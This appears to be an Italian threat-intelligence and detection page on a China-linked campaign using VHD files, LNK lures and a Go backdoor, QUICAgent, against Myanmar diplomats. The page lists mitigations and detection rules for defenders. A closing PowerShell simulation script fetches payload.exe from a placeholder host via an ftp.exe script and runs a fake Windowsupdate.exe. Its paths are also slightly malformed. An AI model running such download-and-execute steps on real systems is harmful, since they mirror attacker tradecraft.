Attore legato alla Cina usa file VHD per colpire diplomatici del Myanmar
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Un attore di minaccia con legami alla Cina sta prendendo di mira il personale governativo del Myanmar attraverso una catena di infezioni a più stadi consegnata tramite file Virtual Hard Disk (VHD). La campagna utilizza file LNK malevoli per abusare di ftp.exe per la ricostruzione del payload e distribuisce un backdoor personalizzato basato su Go noto come QUICAgent. Il malware si affida a Cloudflare Workers per la risoluzione dinamica del C2 e comunica tramite il protocollo QUIC.
Indagine
Il team APT di Seqrite ha analizzato i campioni VHD contenenti documenti esca e identificato file LNK malevoli camuffati da file PDF. L’indagine ha rivelato una tecnica di payload divisa in cui due file sono combinati con il comando copy per ricostruire un eseguibile. L’analisi tecnica dell’impianto QUICAgent ha anche rivelato l’evasione del sandbox tramite hash SHA-256 ripetuti e una validazione personalizzata dei certificati TLS.
Mitigazione
Le organizzazioni dovrebbero limitare l’esecuzione di file LNK non attendibili e monitorare i processi figli sospetti che coinvolgono ftp.exe. Si raccomanda un controllo rigoroso sull’uso di Virtual Hard Disk (VHD) e il monitoraggio del traffico di rete insolito sulla porta UDP 443 utilizzando QUIC. Bloccare i noti endpoint malevoli di Cloudflare Worker può anche interrompere il meccanismo di risoluzione C2 della campagna.
Risposta
Se viene rilevata un’attività QUICSILVER, i sistemi interessati devono essere immediatamente isolati per fermare ulteriori esfiltrazioni di dati e comunicazioni C2. Gli investigatori dovrebbero ispezionare %LOCALAPPDATA% per il binario Windowsupdate.exe e controllare la cartella di avvio dell’utente per SystemIn.lnk. I registri di rete dovrebbero essere analizzati per connessioni a domini C2 e indirizzi IP noti per determinare l’entità della compromissione.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevazioni
Possibile File LNK Malevolo con Doppia Estensione (via cmdline)
Possibile File Malevolo con Doppia Estensione (via process_creation)
Possibile Operazione Manuale o di Scripting Eseguita in Cartelle Insolite (via cmdline)
LOLBAS ftp (via cmdline)
Binario/Core Sospetti in Posizione di Avvio Automatico (via file_event)
Esecuzione Sospetta da Unità Montata (via audit)
Possibile Abuso di Dominio di Sviluppo Cloudflare (via dns)
IOCs (HashSha256) per rilevare: Operazione QUICSILVER: attore con legami alla Cina prende di mira i diplomatici del Myanmar tramite un backdoor Go consegnato via VHD
IOCs (SourceIP) per rilevare: Operazione QUICSILVER: attore con legami alla Cina prende di mira i diplomatici del Myanmar tramite un backdoor Go consegnato via VHD
IOCs (DestinationIP) per rilevare: Operazione QUICSILVER: attore con legami alla Cina prende di mira i diplomatici del Myanmar tramite un backdoor Go consegnato via VHD
Rilevazione di Comunicazione C2 di QUICAgent [Connessione di Rete Windows]
Uso Sospetto di ftp.exe e Windowsupdate.exe per l’Esecuzione di Malware [Creazione di Processo di Windows]
Esecuzione di Simulazione
Requisito Preliminare: La Verifica Preliminare di Telemetria e Baseline deve essere passata.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrazione e Comandi di Attacco: Un avversario mira a stabilire un punto di appoggio imitando i processi di sistema legittimi. Per prima cosa, utilizza
ftp.execon un file script (-s:) per scaricare un payload malevolo, cercando di confondersi con attività amministrative automatizzate. Simultaneamente, simulano il dispiegamento di un binario “Windows Update” (rinominato) per mascherare l’esecuzione del payload. Infine, utilizzano uno script PowerShell progettato per creare un file.lnkmalevolo per garantire la persistenza tramite l’interazione dell’utente. -
Script di Test di Regressione:
# 1. Simula download tramite script FTP (Trigger 1 Parte A) $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit" $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait # 2. Simula esecuzione di Windowsupdate.exe (Trigger 1 Parte B) # Nota: Questo presuppone che esista un file di nome Windowsupdate.exe o che venga chiamato # Per la simulazione, creeremo un file dummy e lo eseguiremo New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force Start-Process "$env:TEMPWindowsupdate.exe" # 3. Simula creazione LNK tramite PowerShell (Trigger 2) Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'" -
Comandi di Pulizia:
# Rimuovi artefatti simulati Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue